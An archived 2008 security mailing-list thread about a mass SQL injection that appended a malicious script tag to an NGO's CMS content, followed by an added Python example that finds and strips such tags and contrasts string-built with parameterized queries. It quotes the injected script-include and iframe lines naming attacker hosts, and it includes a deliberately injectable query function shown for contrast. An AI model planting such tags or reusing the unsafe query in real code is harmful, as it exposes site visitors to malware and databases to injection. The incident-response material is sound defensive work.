Security Incidents mailing list archives

RE: eSafe quarantine: Re: Mysterious JavaScript appearance in website database


From: "Boaz Shunami" <BoazS () comsecglobal com>
Date: Tue, 15 Apr 2008 09:09:36 +0300

Hi Glenn,

Looks like it can be any number of attack vectors.

Your infrastructure is highly vulnerable (NT and IIS 4) and may
contain lots of vulnerabilities you're not aware of. Moreover, your
custom-developed CMS, which is probably ASP based, may have application
security vulnerabilities. Have you tried searching your users' computers'
hosts files for this domain (this may prove to be an interesting attack
vector)? I would highly recommend segregating this application and its
infrastructure from the internet (if possible).

Best Regards,

Boaz Shunami

Comsec Consulting

-----Original Message-----
From: Jon Oberheide [mailto:jon () oberheide org] 
Sent: Tuesday, April 15, 2008 12:53 AM
To: glenn () elaw org
Cc: incidents () securityfocus com
Subject: eSafe quarantine: Re: Mysterious JavaScript appearance in
website database

Looks like an SQL injection attack.

Take a look in your MS-SQL database at the affected entries and I bet
you'll see the nmidahena reference.

Since this is a widespread, automated attack that has affected other
sites, it's unlikely it was targeted at your specific organization or
custom CMS.  Give your codebase a thorough audit for SQL injection
vectors.

Regards,
Jon Oberheide

On Mon, 2008-04-14 at 16:03 -0700, Glenn Gillis wrote:
On Sunday, 2008-April-13 at 01:07:38.030 UTC, the CMS database of the
U.S.-based NGO I work for mysteriously had a JavaScript URL appended to
the titles of much of the content on our website:

   <script src=http://www.nihaorr1.com/1.js></script>

NB: the last modified dates for all of the content containing a
reference to this script are identical, right down to the 1/100 second.

The contents of the script apparently attempt to open an iframe to a
non-existent domain, "nmidahena.com":

   document.writeln("<iframe width=\'10\' height=\'1\' src=\'http:\/\/www.nmidahena.com\/1.htm\'><\/iframe>");

I haven't found any reports of a new worm, etc. that might account for
this, but when I Google "nmidahena.com" I get over 100,000 hits for
other sites on which this script is present.

We are running a custom-developed CMS with MS-SQL Server 2000 as the
backend, on Windows NT Server 4.0 SP6a and IIS 4.0 (Yes, I know! The NT
Server is fully patched with whatever OS, IIS and SQL Server 2K hotfixes
were released prior to NT4's end-of-life declaration by MS, for what
it's worth.)

Anyone have an idea what might have caused this?
-- 
Jon Oberheide <jon () oberheide org>
GnuPG Key: 1024D/F47C17FE
Fingerprint: B716 DA66 8173 6EDD 28F6  F184 5842 1C89 F47C 17FE
**********************************************************************************************
IMPORTANT: The contents of this email and any attachments are confidential. They are intended for the 
named recipient(s) only.
If you have received this email in error, please notify the system manager or the sender immediately and do 
not disclose the contents to anyone or make copies thereof.
*** eSafe scanned this email for viruses, vandals, and malicious content. ***
**********************************************************************************************
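Jon's advice above amounts to two tasks: find the rows in the database that carry the injected tag, and close the string-built-query hole that let it in. The script below is an added example written for this archive, not code from any poster or from the NGO's CMS. It uses sqlite3 as a stand-in for MS-SQL Server 2000, a constructed `content` table with a few sample rows (two of them carrying the exact tag Glenn reported), and function names of my own choosing. `find_injected_rows` searches a text column for the tag, `script_hosts` pulls the referenced hostnames out as an indicator list, `clean_table` strips the tag in place, and `lookup_title_unsafe` / `lookup_title_safe` contrast the classic-ASP concatenated query with its parameterized form: a legitimate title containing an apostrophe breaks the first and is handled cleanly by the second, which is the same flaw the mass-injection traffic relies on.

```python
"""Added example (not from the thread): locate and clean rows carrying an
injected <script src=...> tag, and show the parameterized query form that
closes the SQL injection hole. sqlite3 stands in for MS-SQL 2000; the
table and rows below are constructed sample data."""
import re
import sqlite3

# Constructed sample rows; rows 2 and 3 carry the tag reported in the thread,
# with the identical modification timestamp Glenn observed.
INJECTED_TAG = '<script src=http://www.nihaorr1.com/1.js></script>'
SAMPLE_ROWS = [
    (1, "Annual report", "2008-04-10 14:02:11.000"),
    (2, "Board meeting minutes" + INJECTED_TAG, "2008-04-13 01:07:38.030"),
    (3, "Press release" + INJECTED_TAG, "2008-04-13 01:07:38.030"),
    (4, "O'Brien joins the staff", "2008-04-11 09:15:00.000"),
]

# Matches <script ... src=URL ...></script>, quoted or unquoted URL.
SCRIPT_TAG_RE = re.compile(
    r'<script[^>]*\bsrc\s*=\s*["\']?(?P<url>[^"\'\s>]+)["\']?[^>]*>\s*</script>',
    re.IGNORECASE,
)


def open_sample_db():
    """Build an in-memory database shaped like a simple CMS content table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE content (id INTEGER PRIMARY KEY, title TEXT, modified TEXT)")
    conn.executemany("INSERT INTO content VALUES (?, ?, ?)", SAMPLE_ROWS)
    conn.commit()
    return conn


def find_injected_rows(conn, table, column):
    """Return (id, value) for rows whose text column contains a script tag.
    Table/column names come from the operator's own schema, never from user
    input, so they are interpolated; the search value is a bound parameter."""
    sql = f"SELECT id, {column} FROM {table} WHERE {column} LIKE ? ORDER BY id"
    return conn.execute(sql, ("%<script%",)).fetchall()


def script_hosts(text):
    """Hostnames referenced by injected script tags (an indicator list)."""
    hosts = []
    for m in SCRIPT_TAG_RE.finditer(text):
        url = re.sub(r"^https?://", "", m.group("url"), flags=re.IGNORECASE)
        hosts.append(url.split("/")[0].lower())
    return hosts


def strip_script_tags(text):
    """Remove the injected tag(s), leaving the original title."""
    return SCRIPT_TAG_RE.sub("", text)


def clean_table(conn, table, column):
    """Strip injected tags in place and return the number of rows repaired."""
    repaired = 0
    for row_id, value in find_injected_rows(conn, table, column):
        cleaned = strip_script_tags(value)
        if cleaned != value:
            conn.execute(f"UPDATE {table} SET {column} = ? WHERE id = ?", (cleaned, row_id))
            repaired += 1
    conn.commit()
    return repaired


def lookup_title_unsafe(conn, title):
    """String-built query typical of classic ASP pages: any quote in the
    input becomes part of the SQL itself. Shown only for contrast."""
    sql = "SELECT id FROM content WHERE title = '" + title + "'"
    return [r[0] for r in conn.execute(sql)]


def lookup_title_safe(conn, title):
    """Parameterized form: the title is passed as data, never as SQL."""
    return [r[0] for r in conn.execute("SELECT id FROM content WHERE title = ?", (title,))]


if __name__ == "__main__":
    db = open_sample_db()
    hits = find_injected_rows(db, "content", "title")
    hosts = sorted({h for _, value in hits for h in script_hosts(value)})
    print(len(hits), "injected rows; referenced hosts:", hosts)
    print("repaired", clean_table(db, "content", "title"), "rows")
    print("safe lookup:", lookup_title_safe(db, "O'Brien joins the staff"))
    try:
        lookup_title_unsafe(db, "O'Brien joins the staff")
    except sqlite3.OperationalError as exc:
        print("unsafe lookup failed on a legitimate title:", exc)
```

On a real MS-SQL 2000 box the same search would be run per text column against the production schema (a `LIKE '%<script%'` over each `varchar`/`text` column), and the cleanup would be done on a backup first; the parameterized lookup is the pattern to apply across the CMS codebase during the audit Jon suggests.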

